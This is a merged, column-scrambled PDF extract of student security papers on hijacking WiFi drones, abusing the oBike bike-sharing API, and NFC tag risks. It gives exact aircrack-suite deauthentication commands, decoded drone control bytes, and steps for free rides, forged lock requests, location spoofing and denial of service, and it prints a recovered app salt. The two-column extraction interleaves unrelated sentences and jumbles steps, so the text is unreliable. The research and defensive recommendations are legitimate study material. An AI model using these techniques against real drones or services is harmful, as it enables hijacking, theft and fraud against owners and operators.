PDFsam_merge 11
15
Figure 1. Hardware Setup The drone’s WiFi network is not password protected, hence any
Software used: phone is capable of connecting to it. The JJRC RC App is freely
available for download in app stores
● Python 2.7
● Airdrop-ng During our experimentations, we discovered interesting behaviour
● Airmon-ng in the drone-client communications that are noteworthy. For the
● Aircrack-ng scenario that two users connect to the drone concurrently, we refer
● Wireshark network protocol analyzer to the user who successfully connects first as the primary user,
● Tshark network protocol analyzer and refer to the other user as the secondary user.
● When the primary user is controlling the drone, the
We will be running our experiments using a Linux-based system. secondary user can connect to the same WiFi network
In addition, a special kind of wireless network adapter is needed – and view the camera footage stream via the app. The
one that supports monitor mode and packet injection. By having secondary user is unable to control the drone while the
monitor mode, we are able to monitor all traffic received from a primary user has control over it.
wireless network without needing to link with an access point or ● Once the primary user disconnects from the drone, the
ad hoc network [7]. secondary user will be able to control the drone.
gp02
PDFsam_merge 12
16
3.2 DJI Mavic Pro
3.2.1 Background
The DJI Mavic Pro has two modes of operation: through the
Smartphone Application or Radio Controller. Due to time
constraints of this project, we will only look at control of the
drone via the Smartphone Application.
The Smartphone Application will control the drone using the
drone’s WiFi network. The typical use case of DJI Mavic Pro
using WiFi is outlined below.
1. Before turning on the Mavic, the user flips the Control
Mode switch on the drone to the WiFi option. Figure 2. Packet Sniffing with Wireshark
2. The user turns on the aircraft and connects to the
One of them is large UDP packets from port 4096 of the drone to
Mavic’s network, which has the format Mavic-xxxxxx.
port 8888 of controller, which is presumably the video stream.
The password is on a QR code sticker pasted on the
Another is 12 byte data TCP packets from source port 39005 of
front right arm of the aircraft.
the controller from the mobile application to the destination port
3. Once connected, the user opens the DJI Go app. The
8888 of the drone.
user will now be able to see settings and live view as
normal. The user can also change SSID name and Lastly, there are a number of 11 byte data UDP packets from
password if desired. source port 45048 of the mobile application to destination port
4. The user will be able to navigate the drone using the app 8080 of the drone.
controls. The app streams live footage from the drone’s We noticed that the data in the 11 byte UDP packets tend to
camera. remain constant until commands are given from the controller,
The DJI Mavic Pro user guide discloses some interesting features leading us to believe this is the port that is responsible for
which are potentially useful for us. receiving commands for the drone.
● The drone’s WiFi network is password encrypted and Now that we know what packets to look out for, we will
follows WPA protocol. Drones come with a default investigate further into the data of packets sent to this particular
password that contains 8 hexadecimal values. port 8080. Since there is a lot of traffic between the drone and the
● The drone has a failsafe procedure where it will return controller, wireshark tends to get flooded with information,
home if the app crashes or if the user loses WiFi making it difficult to keep track of the changes in the data packet.
connection. Home is where the drone thinks the user is. In order to view the data contents easily, we used tshark and
● A lot of flight mode features are disabled and the range filtered the data using the command sudo tshark -I -f
is significantly less on WiFi mode. "port 8080" -f "dst net 172.16.10.1" -Y
"frame.len==102" -T fields -e data
4. ANALYSIS PROCESS
In this section, we will explain the procedure we have taken to
analyze the data being transmitted to and from the drone. Since all
data is being transmitted through the JJRC WiFi network, we will
be mainly looking at the WiFi packets going through this network
using Wireshark and Tshark.
4.1 Capturing
When we ran wireshark, we could see multiple TCP and UDP
packets to and from various ports on the drone. It mainly
consisted of three different types of packets.
gp02
PDFsam_merge 13
17
4.2 Analyzing
The first thing we noticed in the 11 byte data field is that the first 5. ATTACK VECTORS
two bytes are always of value ff 08 and that the 7-9th byte will
always be 90 10 10. Secondly, the last byte is repeated for Based on the results in Section 4, we were able to perform two
certain commands, leading us to believe the last byte is a types of attack which will be further elaborated in this section.
checksum.
The 3-4th bytes control movements up, down, left and right, with 5.1 Denial of Service Attack
the default value as 7e 3f. The 5-6th bytes control the The Denial of Service attack was carried out by filtering out
movements forward, backward, rotate left and rotate right, with SSID-s from the airodump report which match the known SSID-s
the default value as 40 3f. Lastly, the 10th byte controls the start of the drone. In the scope of this project, we performed the
and stop commands of the drone, with the default value as 00. experiment with both “JJRC-XXXXX” and “Mavic-XXXXXX.”
The table below summarises how each byte position corresponds We can assume that the standard SSID of the wireless network
to each drone’s command. created by the drone is publicly available for other manufacturers
Table 2. Frame Inspection as well. Information about the hardware addresses of these
networks was passed on to generate a filter settings file for
Byte 1-2 3-4 5-6 7-9 10 11 airdrop-ng.
Pos Airdrop-ng, which is part of the aircrack-ng package, broadcasts
a large amount of deauthentication packets which disconnects the
Com ff 08 Up Fwd 90 10 10 Start Check controlling device from the drone and prevents reconnection for
mand Down Back Stop sum as long as the deauthentication packets are being broadcast.
Left Rleft
Right Rright Else: Our step by step approach to perform the denial of service attack
00 is described below.
Else: Else:
1. The WiFi adaptor is first set to monitoring mode using
7e 3f 40 3f
the command airmon-ng start wlan0
2. We initiate Airodump on the WiFi adaptor to capture all
Next, we looked into what is the content of each specific byte for the WiFi traffic into a file tempdata with the command
each specific command. What we found is summarised in the airodump-ng -w tempdata wlan0mon
table below. 3. From the traffic captured, we identify our target drone
and create a airdrop-ng settings file with a python script,
which would deauthenticate all clients connected to the
Table 3. Summary of the Drone Command in hexadecimal
drone with the SSID of JJRC-XXXX.
Command Byte Position(s) Byte(s) 4. We proceed to flood deauthentication requests via the
WiFi adaptor with the command python
Vertical Up 3-4 fc 3b /usr/src/aircrack/scripts/airdrop-ng/
airdrop-ng -i wlan0mon -t
Vertical Down 3-4 00 40 tempdata-01.csv -r settings.txt .
tempdata-01.csv file is the output of the airodump-ng
and settings.txt is the filter file created by the python
Horizontal Left 3-4 72 01
script.
5. Within seconds, the user will lose control of the drone
Horizontal Right 3-4 84 7e and is unable to send anymore commands using the
mobile application.
Move Forward 5-6 01 43
Start 10 40
Stop 10 a0
gp02
PDFsam_merge 14
18
drone it is possible to take over the DJI drone in Wi-Fi mode
when flying close enough to it.
5.2 Session Hijacking
The cheaper and simpler drones, as represented by the JJRC Elfie
drone in our project, use an open Wi-Fi network for 6. DISCUSSIONS
communicating with their control devices. Our observations In this section, we will describe the challenges that we faced and
indicate though that only the first client to connect to the network also how we can improve on our experiments if we had more
is given sole control of the drone. time.
The following clients are capable of only viewing the
videostream. This means that after flooding deauthentication 6.1 Limitations
packets, our attack machine just needs to be the first to connect to In this project, due to the limited time we have with the DJI Mavic
the drone in order to gain full control of it. Pro, we were unable to explore any other attacks that the DJI
Mavic Pro may be vulnerable to.
This proved to be relatively simple as the attacking machine has a
time advantage and can start connecting to the drone as soon as it We managed only to perform a deauthentication attack on the DJI
stops sending the deauthentication packets, whereas the initial Mavic Pro and were unable to perform the session hijacking as it
controlling smart devices implement a timeout between requires time for decrypting and analysing the packet transmitted
reconnection attempts. between the drone and the user.
When connection is established with the drone, we can control the 6.2 Future Work
drone by mapping the control commands sniffed with tshark One future expansion of the project will be to perform a brute
earlier onto the keyboard. When the original controlling device is force on the DJI Mavic Pro access point password and decrypt the
able to reconnect to the drone, it will be limited to only the camera packets transmitted between the user and the drone.
view functionality, effectively losing control of the drone.
With the recent announcement of the KRACK attack on WPA2
In order to regain control of the drone, it would have to launch a [9], it is also possible to capture the 4-way WPA2 handshake, so
similar attack on its own. the brute force attack can be done independently from the drone.
We would also like to experiment on the DJI Mavic Pro with GPS
Spoofing. When the drone is disconnected from the user, its
failsafe procedure is to return to the user. Since we have verified
that deauthentication of the WiFi connection to the Mavic is
doable, we can trigger the Mavic to return to the user. At the
same time, we can spoof the GPS coordinates such that the drone
would return to us instead of the user, proving an attack vector
that allows attackers to steal expensive Mavic drones controlled
over WiFi.
7. CONCLUSIONS
After analysis of the DJI Mavic Pro and the JJRC Elfie H37, we
can see that commercial drones vulnerable to simple attacks exist
Figure 5. User Interface of the hijacking controller on the market.
Although we were unable to hijack the more sophisticated DJI
The more expensive and technologically advanced DJI Mavic Pro Mavic Pro, denial of service attacks through WiFi
drone uses WPA2-PSK to secure its wireless network. The default deauthentication was still possible. In terms of CIA, cheaper
key is a 8 character long hexadecimal value which is unique to drones tend not to ensure confidentiality.
each machine.
As we can see from the two drones, the DJI Mavic Pro uses
This prevents a simple session overtaking, but alternative WPA2-PSK to secure its wireless network, while the JJRC Elfie
approaches which are not in the scope of this paper are possible. H37 does not even have a password for its open network. In both
We identified two approaches to hijack the Wi-Fi control sessions drones, we can see that integrity exists as the DJI Mavic Pro only
of the DJI Mavic Pro. allows a single connection to the drone at ay point in time, while
We were able to capture the 4-way handshake between the the JJRC Elfie H37 refuses commands from secondary users.
controlling smart device and the DJI drone. WiFi-controlled drones on the market still fail to enforce
The keyspace for the default passwords is 8 hexadecimal values, availability, allowing attackers to prevent victims from controlling
or 32 bits which means that it is susceptible to a bruteforce attack their drones with WiFi deauthentication. Overall, it seems that
in a reasonable amount of time. most drones on the market were built without security
considerations, having little to no security at all. More
The other attack vector we observed is that the default password is sophisticated drones do have more protection against most attacks
printed on the outside of the drone in both human-and with encrypted communications, but may still contain
machine-readable form (QR-code). This means that using vulnerabilities.
appropriate optical hardware and our demo machine attached to a
gp02
PDFsam_merge 15
19
8. ACKNOWLEDGMENTS
We would like to thank Professor Hugh Anderson for his patience
and guidance in helping us with the project.
Next, we would also like to thank Professor Martin Henz for
providing us with the DJI Mavic Pro for the experimentation.
Lastly, we would like to give credit to the user adria.junyent-ferre
from hackaday.io who did a similar project with the JJRC Elfie
drone, which provided us inspiration on how we can control the
drone using our laptop.
9. REFERENCES
[1] Meier, C. (2015, February 03). A Brief Introduction to
Drones. Retrieved November 01, 2017, from
http://www.deaftv.co.za/brief-introduction-drones/
[2] Dronelli, V. (2017, October 23). The 20 Best Cheap Drones -
[Fall 2017] Affordable Drones For Beginners. Retrieved
November 01, 2017, from
https://www.dronethusiast.com/cheap-drones-guide/
[3] Shepardson, D. (2017, March 22). U.S. commercial drone
use to expand tenfold by 2021: government agency.
Retrieved November 01, 2017, from
https://www.reuters.com/article/us-usa-drones/u-s-commerci
al-drone-use-to-expand-tenfold-by-2021-government-agency
-idUSKBN16S2NM
[4] Amazon Prime Air. (n.d.). Retrieved November 01, 2017,
from
https://www.amazon.com/Amazon-Prime-Air/b?node=80377
20011
[5] Project Wing – X. (n.d.). Retrieved November 01, 2017,
from https://x.company/projects/wing/
[6] Walters, S. (2016, October 29). How Can Drones Be
Hacked? The updated list of vulnerable drones & attack
tools. Retrieved November 01, 2017, from
https://medium.com/@swalters/how-can-drones-be-hacked-t
he-updated-list-of-vulnerable-drones-attack-tools-dd2e006d6
809
[7] November 02, 2017, from
https://latesthackingnews.com/2017/07/19/what-is-monitor-
mode-in-wifi/.
gp02
PDFsam_merge 16
20
Exploration of Weakness in Bike Sharing System
Tan Fengji Tan Jian Sin Tan Ngee Joel Jonas
NUS School of Computing NUS School of Computing NUS School of Computing
13 Computing Drive 13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 11741 Singapore 11741
+65 8626 0290 +65 9451 7087 +65 9178 7092
a0129845@u.nus.edu e0003810@u.nus.edu a0121298@u.nus.edu
Tan Wee Chen William Tang Di Feng
NUS School of Computing NUS School of Computing
13 Computing Drive 13 Computing Drive
Singapore 11741 Singapore 11741
+65 8383 0049 +65 8366 6988
a0121760@u.nus.edu e0011840@u.nus.edu
gp03
PDFsam_merge 17
21
The app will then package the keys in an encrypted BTLE 3.3 API Requests & Responses
message and send it to the bike, releasing the lock on the bicycle.
API Endpoint:
The lock will then send a BTLE message back to the app, https://mobile.o.bike/api/v2/CATEGORY/ACTION
informing the app that the bicycle has been successfully unlocked. Example APIs:
The app will then send a request to the API (acknowledgement https://mobile.o.bike/api/v2/bike/060508811/lockNo
packet), informing the server that the bicycle is now in use. At this https://mobile.o.bike/api/v2/member/account
point, the app will reflect a new ride being started and the unlock https://mobile.o.bike/api/v2/bike/unlockPass
button will be disabled.
There are also instances when the unlocking process fails. In this Request Method: POST
case, the app also sends a request to the API, but informs the Request Type: JSON
server that the unlocking process has failed instead. The unlock Request Body: Single ‘value’ field containing an encrypted string
button in this scenario will remain unlocked and user can either Response Type: JSON
try again or try to scan the code of another bike. Response Body: Plaintext
gp03
PDFsam_merge 18
22
5. EXECUTION
5.1 Replaying of BTLE messages from a
previous session
One of the very first attacks attempted was a BTLE replay attack.
Since the app and the bike communicates purely through BTLE,
intuitively the replay attack came into focus. In order to carry out
the attack, the team used a open source python script
(BLE-Replay) to reply BTLE packets captured on an Android
phone that have recently unlocked a bike through the oBike app. The bike application acts as the communication medium between
the BTLE device (bike) and the server. This architecture exposes
The packets was first verified to be captured with proper it to MITM attacks where the attacker can create, modify and drop
formatting before putting through the script. In addition, in order packets.
to reduce the chances of false-negative, packets of 3 separate
bikes were captured and the 3 bikes were physical positioned side Attempts were made to get free rides. These attempts were done
by side in range of the attack machine. The packets were then put through dropping packets that were meant to be sent to the server
through the script for the reply attack to be carried out. as acknowledgement for the start and end time of the journey. The
ability to interfere with the API requests were possible through
After running the script, there was no visible change/movement
setting a proxy between the application and the server.
on the bike locks. The attack had failed.
Upon going through our proxy logs, 3 instances across 2 different
APIs where the acknowledgement packet/request was being sent
5.2 Sending of forged BTLE messages were determined. Firstly, during the initial unlocking of the bike
By just observing the packets captured, it is clear that with the through the lockMessage API. Secondly, during the physical
exception of the update location packet, other packets looked locking of the bike also through the lockMessage API. Lastly, in
gibberish. Thus, in order to forge or modify the BTLE messages, the event where the app did not receive a response from the server
One would first have to find out how the messages were after sending the acknowledgement packet/request described
encrypted and decrypted. above, a fail safe mechanism would retry and send the
acknowledgement packet again through the hisLockMessage API
In order to fully understand what the packets are conveying, the when the app is restarted. Hence upon uncovering these instances,
oBike app is decompiled to give a bare view of the source code we are now ready to put our hypothesis to the test.
and its internal operations. Decompiled source code have rename
obfuscation applied, making understanding the app internal Steps took and things tried:
workings a challenge. Step 1: Setup a proxy to view and set rules to filter specific
packets.
Step 2: Scan the QR Code to unlock the bike.
Step 3: Confirm physical unlock of bike - First Instance
Step 5: Check and confirm that our proxy dropped the
acknowledgement packets/requests.
Step 4: Check if app started a ride (recorded a start entry)
Step 5: After using the bike, manually lock the bike. - Second
Regardless, scouring, tracing and guessing through the source
Instance
code has lead the team to believe that part of the gibberish packets
are encrypted. However, as the decompiled source code is not the Step 6: Check and confirm that our proxy dropped the
exact source code, there are many segments of codes that are left acknowledgement packets/requests
uninterpreted or fully understood. Eventually, the team was not Step 7: Check if any ride was recorded as history in the
able to decrypt the packets nor send any forged BTLE messages. application.
Step 8: Restart the app - Third Instance
5.3 Interfering with API requests Step 9: Check and confirm that our proxy dropped the fail safe
Attacks on the communication channel between the app and the acknowledgement packets/requests
server were conceived. It was hypothesized that blocking blocking Step 10: Check that no ride was started and no ride was recorded
certain API requests may confuse the server into thinking that the as history in the application.
bike is still locked even though the bike is already physically
unlocked. At each of those instances API request for the acknowledgement
packet/request was successfully blocked, the ride was not
recorded anywhere on the app and the server. This serves as a
proof to deem the hacking attempt to gain a free ride by
interfering API requests was a success.
gp03
PDFsam_merge 19
23
However, subsequently after the hack, it was found that the extent market. The oBike app would likewise be unable to tell if the
of the hack extends way more than just gaining a free ride. It location was spoofed or not.
seems that due to the blocking of the acknowledgement Another way of changing the location data can be done through
packets/requests, the server mistakenly deem the bike as being physical means. When the bicycle is moved from one location to
faulty. Hence, once the hacked bike is locked, it would not be another without unlocking the bicycle, the location data stored in
possible to unlock it again (server returns ‘faulty bike’ error the server will not be updated and thus, resulting in inaccurate
message) until either the admin manually resets the faulty status information for the bikers.
of the bike or a timeout happens on the server side. Through
observation, the timeout seems to be the next day. Meaning to say
if a bike was hacked on monday (regardless of time), it would
only be available again on tuesday (regardless of time).
5.6 Sending lock API request directly after
unlocking
Another attack conceived was to craft and send fake API requests
5.4 Modifying API responses to enable in attempt to gain rides at minimum cost.. First, the user has to
certain features of the app (client sided) and unlock the bicycle through the app. The app sends some API
requests and a ride is started. As the cost of ride increase as the
checking for server side validation rental time increases, the attack attempts to send an
oBike’s users are categorized under paid users and free users. Free acknowledgement packet/request immediately after the bike is
users are unable to rent any of the bikes. Free users only have the unlocked. This would ensure that the rental time is almost close to
ability to deposit money while paid users have access to all zero and the user would only have to pay the minimum fee.
features within the app. These features include scanning qr code
To do so, the user sends a crafted/forged request indicating the
and unlocking of bikes. As the app relies on the API response to
bicycle is locked without physically locking the bicycle. That
make this distinction, it is theoretically possible that the features
way, the server will be tricked into thinking the bicycle is locked,
are only restricted on the client side.
while the the bike remains unlocked. The user can then ride the
To put that theory to the test, a free account was used and API bicycle for an indefinite period of time without paying for the
responses were modified before the app receives it. Initial results extra time and also without the server knowing.
shows the user interface adapting to the change and unlocking
Through carrying out the actual attack, the assumptions and idea
certain buttons that only paid user have access. However, upon
were confirmed. The attack worked as expected and all rides only
trying to unlock the bike, an error message is prompted, asking
costs $0.50 (minimum fee).
the user to deposit money. Hence, it seems that while the app acts
as a gatekeeper or coordinator of which API request is available,
the final validation still lies on the server side.
5.7 Sending multiple API requests to the
server containing random/malformed data
5.5 Updating the server with fake location Through observing the proxy logs and also the decompilation of
data of a bike the app, a complete list of API currently in used by the app can be
discovered. While it is unknown as to what this attack might
Because it is possible to communicate directly with the API, there
reveal, what is generally looked out for are holes within the
are plans to craft requests that would interfere with how the
validation mechanisms that the server might have in place when
system normally works. One such request planned was to tamper
dealing with API requests. These holes may come in the form of
with the location data which will be sent by the phone when the
explicit error messages that might reveal server/code details. It
bicycle is locked. This way, the location of the bicycle received
may also present itself as a heavy operation that takes a long time
by the server is no longer accurate. Other users will not be able to
to return a response or a malformed requests that was not rejected
find the bicycle at the location reflected on their app.
when it should have been.
Steps took or things tried:
The attack is carried out in 3 stages.
Step 1: Setup a proxy to sniff the packets.
Firstly, API request were edited to contain missing or extra fields
Step 2: Unlock the bicycle. that the server might or might not expect. However, this approach
Step 3: Lock the bicycle. saw no loophole within the validation mechanism. Missing values
were flagged with a generic error message while extra fields
Step 4: Intercept location update packet, decrypt, modify the seems to be simply ignored.
location coordinates then encrypt.
Secondly, API request were edited to contain correct fields with
Step 5: Send the modified packet to the server. incorrect/malformed values. Some strategies were used when
Step 6: Confirm that the location has been updated in the server changing the values. Values were changed to out of bound values
through reloading the app. ,SQL injections and logically impossible values (e.g. timestamp
was changed to 10 years ago). Unexpectedly, 2 of these edits were
Upon reloading the application, the location of the targeted bike not flagged by the system. 1 of the 2 edits was changing the
has been updated to the set location coordinates. timestamp of when a ride started, it resulted in the account being
Alternatively, if a user does not have a means of decrypting bugged and have ride with a negative ride time. The other edit
packets, which the above relies on, the user can also fake the was the server accepting impossible gps coordinates.
phone’s internal gps coordinates through various other apps on the
gp03
PDFsam_merge 20
24
Lastly, random API request were sent to non-existent API 6. ADDITIONAL FINDINGS
end-points. Expectedly, none of the attempts yielded anything
useful. A generic error message was returned. 6.1 API Encryption and Hash Techniques,
Secret Keys and IV
One major challenge, when creating/forging API request was the
5.8 Sending API requests that would trick encryption. Since the request was encrypted, any manipulation of
the server into thinking the bike is faulty the encrypted string can be immediately detected and rejected by
Apart from the vulnerability found in API Interference (Section the server. However, as part of the process of uncovering the
5.3), attempts were made to achieve similar results in tricking the BTLE encryption (see section 5.2), certain comments left by the
server to think that the bike was faulty. When a bike is deemed as developer in the decompiled source code were discovered. In
faulty, the server rejects all attempts to unlock the bike. Hence, if particular, a comment left by the developer "/* compiled from:
the server can be tricked, a denial of service attack is achieved. APIEncryptHelper */" was discovered, which eventually lead to
the understanding of how packets/requests between the App to
As the app contains a ‘report problem’ function, an idea to use it
Sever were encrypted.
to render a bike ‘faulty’ was conceived. The idea was tested but
the results varied. In some instances, the attack seemed to work Encryption Technique
after a period of time however in other instances, nothing seemed The request body is first converted into hex. The converted hex
to have changed. It is unclear if the bike status was maunually string is then encrypted using an encryption scheme, key and iv.
changed by the admin or by some automated code. Next, a hash value is calculated by hashing the request body
Another idea tested out was to try sending unlock API requests for appended with ‘&’ + key [hash(request-body&key)].
a single bike using 2 different accounts. The results showed that However, knowing just the technique isn’t enough. There are still
when an account sends the unlock API request, the bike is bound unknown elements that are not found. These unknown elements
to that account for the duration of the ride any additional requests include the encryption scheme, key, iv and hash scheme and key.
are rejected. Hence, this approach was not able to achieve a faulty Through further digging and tracing, it is discovered that all of our
status. unknown elements reside in an external library stored somewhere
within the app.
5.9 Sending API requests to reserve
multiple bikes indefinitely
One of the features offered by the oBike app is the ability to
reserve bikes. Each account is supposedly only able to reserve a
single bike at any moment. Reserved bikes are only unlockable by
the user that reserved it. Reserved bikes will remain reserved for a Subsequently, the library is located and disassembled using IDA
period of time until a timeout occurs or the user unlocks it. Hence, Pro. After analyzing the strings within the disassembled library,
if a vulnerability is found within the reservation sub-system, then, certain strings stood out.
a denial of service attack might be possible.
In order to carry out the attack, reserve API requests were logged.
Then multiple bike ids are recorded. With these 2 pieces of
information, the attack is ready. The idea is to send multiple
reserve API requests with different bike ids using the same
account. Upon carrying out the attack, error messages were
returned after the first reserve API request was sent. Through this
result, it would seem that the server validates each reservation
request and check if the account has a prior reservation.
gp03
PDFsam_merge 21
25
Hash Used: SHA-1 every bike in the system to become ‘faulty’, achieving a service
Salt Used (appended to request data): &oBaddX4buhBMG243 (& wide denial of service attack.
+ oBaddX4buhBMG + app version number)
gp03
PDFsam_merge 22
26
8.3 Denial of Service
With carefully crafted requests sent to the server (section 5.3 &
section 7.3), the server may determine that the bicycle is faulty
and will no longer accept any more attempts to unlock it, be it
legitimate or not, until after a certain period of time.
The likelihood of this attack is low since it requires a moderate
level of technical expertise in crafting the requests. It will take a
significant amount of effort for a layman to replicate this attack.
As for the impact of this attack, it goes without saying that this is
a serious issue. The service wide denial of service would not only 2. Apply String Obfuscation (Android ProGuard,
paralyze the business but would also do great harm to the PreEmptive Solutions, etc.), making as much of the
reputation of the company. Customers would steadily lose code unreadable as possible
confidence in the company and would request for their refunds
back. This might make the company go out of business.
While the likelihood of this attack is low, the consequences of the
attack is devastating. Hence, the overall severity of this attack is
very high.
3. Compile without debug symbols, this would remove all
comments within the built app
9. RECOMMENDATIONS Shortcomings:
From the attacks described above, it is clear that the success of
these attacks revolves around 5 main weaknesses within oBike’s Obfuscation makes the code difficult to understand, but not
implementation and architecture. impossible to understand. With ample time, the attackers can still
understand the source code.
1. Weakness in security through obscurity of app source
code. By decompiling the app, attackers can easily
understand the internal workings (Comments are left 9.2 Improving the Unlock Protocol
inside and only rename obfuscation technique is
As introduced earlier, after the user unlock the bike, the app will
applied)
send the acknowledgement packet to the server. After that, the
2. Flaw in oBike’s unlock protocol/logic. The unlock
server will record the acknowledgement packet and start to charge
protocol/logic places too much trust and power on the
the user’s account. However, it was also mentioned that attackers
user.
could block the acknowledgement packet to use the bike without
3. Weakness in encryption scheme used. Symmetric
any being charged.
encryption is used to send requests to server. This can
be easily broken if the secret key is found. Hence, it is recommended that the server starts charging or least
4. Weakness through bad practice. Secret key and salt starts recording a trip being started upon sending the bike unlock
hashes are embedded within the application in plaintext, keys instead of only after the acknowledgement packet is
allowing attackers to easily discover them. received. This way, it protects the business interest of the
5. Weakness in choice of communication channels. Due to company and at the same time, attackers would be charged
the bike not being in communication with the server, all regardless. Since it is inevitable for the attacker to request for the
data have to be relayed through the app. This inherently bike unlock keys, it means that charging cannot be avoided.
exposes the entire architecture to MITM attacks. Purposefully blocking any packets in the later stages will only
result in a higher cost.
Our recommendation targets the 5 weaknesses detailed above.
However, some may argue that in the event of a legitimate failed
unlock process, users will still be unfairly charged. The solution to
9.1 Turn Up the Obfuscation that would be simple. The acknowledgement packet would relay
After decompiling the app, many details regarding the internal the status of the unlock process and the server can choose to
workings were revealed. Although rename obfuscation (section waive off whatever charges that have been incurred.
5.2) was applied, it was a weak measure against efforts to reverse The new unlock protocol described above would not only ensure
engineer. More notably, the comments left in the decompiled that there would be no incentive to block the acknowledgement
source shed light into much of how information is processed packets but would also ensure that the business interest is
within the app which included how request and data were preserved in any situation. In addition, gaining free rides would no
encrypted. As such, it is recommended for the following measures longer be as easy as blocking/dropping packets. Attackers would
to be applied on top of what is already implemented. now have to craft/forge acknowledgement packets that falsely
1. Apply Control Flow Obfuscation (Android Proguard, indicates a failed unlock process. This would require intimate
PreEmptive Solutions, etc.), adding noise to the code to knowledge of how requests are encrypted and also the secret keys
make the code difficult for human to understand and salts. While this is by no mean full-proof, it significantly
increase the difficulty of attack the protocol.
Shortcomings:
gp03
PDFsam_merge 23
27
An attacker with the knowledge of the secret keys and salts can 10. PROJECT CHALLENGES
still gain free rides.
10.1 Unfamiliar with BTLE
BTLE is a relatively new technology, coupled with the fact that
9.3 Preventing Users from Decrypting bluetooth has relatively low usage in the daily lives of most
people. This has lead to surface level of how the technology
Packets/Requests works, which has proven to be a challenge for the project.
After decompiling the app, the secret keys used in encrypting
request was exposed. It was also revealed that a symmetric
encryption scheme was used. In other words, a full break was 10.2 Decompiled Source Code
achieved. Asymmetric encryption would be a better choice. Even
after intercepting the packets/requests sent to the server, without The decompiled source code of the app was difficult to
the private key, which would only be stored in the server, it would understand. The flow of the program was hard to trace.
not be possible to decrypt the contents in a reasonable amount of
time. It would be hard to forge packets with valid content without
knowing the format of the plaintext. It would take a lot more time 11. ACKNOWLEDGEMENTS
and effort on the attackers part. We would like to thank Dr. Hugh Anderson for his unwavering
Shortcomings: support and guidance towards our project.
gp03
PDFsam_merge 24
28
Securing NFC Tags
Chua Yu Peng Lee Ying Jie Teng Yong Hao
National University of Singapore National University of Singapore National University of Singapore
e0002852@u.nus.edu a0130720@u.nus.edu e0003881@u.nus.edu
General Terms
Experimentation, Security, Theory.
2. OVERVIEW OF NFC
Keywords 2.1 History
Near Field Communication (NFC), Android, Public Key NFC has been around for decades, ever since it was approved in
Infrastructure (PKI), Digital Signature. 2003 as an ISO/IEC standard, and later as an ECMA standard. It
is rooted in the radio frequency identification technology, or
better known as RFID, which uses electromagnetic induction in
1. INTRODUCTION order to transmit information. Since the approval, it has been
1.1 Near field communication (NFC) gaining traction steadily, first picked up by Nokia, Philips and
The adoption of Near-Field Communication (NFC) has grown Sony when they established the NFC Forum in 2004 [2], to
drastically over the years. As shown in a survey conducted by coming out with NFC tags in 2006, to NFC enabled phones
Juniper Research, it is projected to have a take-up rate of more appearing in 2010, and even specialised NFC advertising
than five times its past user base of 101 million NFC-based companies being established such as Tapit Media in 2011. Today,
transactions in 2014, to more than 500 million users by the end of various online wallets are implemented with NFC, most notably
2019[1]. This prevalence can be attributed to the success of Apple Pay and Android Pay [3], and many credit cards also come
smartphones. Due to NFC’s widespread presence, more and more equipped with NFC capabilities to allow ease of payment for their
devices, such as credit cards, door keys and advertisement customers.
materials are turning to this contactless technology to enhance the
user experience. 2.2 What It Is
To understand NFC, it may be wise to first take a brief glance at
1.2 Motivations RFID. Essentially, RFID is the usage of radio waves for the
Despite its obvious benefits in convenience and ease of use, there unique identification of a variety of objects. The implementation
has been no clear way to verify the authenticity of an NFC tag in of such a system constitutes 2 parts: a tag, as well as a reader.
an event where an adversary introduces a malicious NFC tag There are currently 3 different frequencies at which passive RFID
which compromises a user’s NFC enabled device. For example, tags operate at:
the adversary could insert a malicious web address and the user’s
• Low Frequency (LF) 125 -134 kHz
NFC enabled smartphone could read the tag and access the link
• High Frequency (HF) 13.56 MHz
immediately as long as NFC was enabled and the phone was not
locked. • Ultra High Frequency (UHF) 856 MHz to 960 MHz
gp04
PDFsam_merge 25
29
Bluetooth, WiFi, and other wireless communication technology an effective means to mass deploy malicious payload. Public
standards, NFC sends information over radio waves, with data spaces where the tags can be found are often accessible to anyone
transmission rates at either 106, 212 or 424 kilobits per second. at any time, and one can easily gain physical access to the tags. It
After the connection is successfully established, it can then is also not difficult to perform malicious actions to those tags, as
activate a set of functionalities of the NFC enabled device. they have no mechanism to ensure its security.
If an NFC tag containing a link is scanned, the smartphone
2.3 Current Uses (Android-based) will not ask the user for a confirmation before
From contactless payment systems to acting as identity and access launching the browser and accessing the URL obtained. By
tokens and even gaming, NFC enjoys a wide range of applications directing the unsuspecting user to a spoofed website, the attacker
in the world today. Over the years, it has become more and more can proceed to conduct browser based attacks such as XSS and
prevalent to incorporate NFC into our daily lives. Some example CSRF, or phishing attacks to steal important credentials, or even
uses include both Android Pay and Apple Pay, as mentioned tricking the user into mistakenly installing malware whilst being
previously, and also in Samsung smart doors where you have the under the impression that they were downloading an advertised
option to use a card to unlock your door instead of traditional file on posters accompanying the NFC tags. In a bid for
keys. An innovative idea might be the incorporation of NFC tags efficiency, the smartphone will launch applications to serve the
into your business card for your potential customers to access say, NFC content without explicitly asking for user approval or choice
your website virtually instantly! of application [9]. This could potentially be very dangerous.
2.4 Prospect According to a survey conducted by CNBC [10], less than 14% of
The usage of NFC and NFC-based development also appears to the surveyed smartphone users do not have antiviruses installed
be on track to expand even further as Apple Inc. announced [5] on their phones. Any attack that surfaces might have an
that with the current version of its mobile operating system, iOS undesirably high chance of success. Examples of attack scenarios
11, it now allows third-party developers to be able to read from will be discussed further in the following subsection.
NFC tags. Most Android smartphones already have the capability
to read and/or write onto NFC tags with appropriate software. 3.3 Analysis on Possible Exploits
With 99.6% of new smartphones now being either the iPhone or 3.3.1 Social engineering
Android-based [6], it can be said with certainty that NFC will
In a social engineering attack, the attacker can prey on unwary
continue to see a great rise in usage over the next few years.
victims by simply pasting a malicious NFC tag over a legitimate
one and restricting interaction with the latter via the use of a
Faraday cage, as described previously. The malicious tag may
3. EXPERIMENTATION PROCESS contain a URL to a phishing website or wireless credentials to a
rogue wireless access point.
3.1 Overview of NTAG203/NTAG213
Developed by NXP Semiconductors, NTAG203 and NTAG213 To carry out the attack, the attacker must first gain physical access
have only the capacity of 144 bytes compared to their larger- to the NFC tag and be unrestricted from physically tampering with
storage counterparts. However, these are more widely available it. This is, however, likely to be the case every time as the very
due to its compatibility with a wide range of smartphones and nature of NFC’s close-proximity workings dictate that anyone will
lower cost. The difference between NTAG203 and the newer be able to go up to the tag and interact with it.
variant, NTAG213, is that the latter features a 32 bits 4 digits
password [7], enabling restriction to operations that may alter the In addition, since the NTAG203/NTAG213 tags can be purchased
memory of a NFC tag. A NFC tag is typically used to facilitate from the Internet both easily and cheaply for under a dollar,
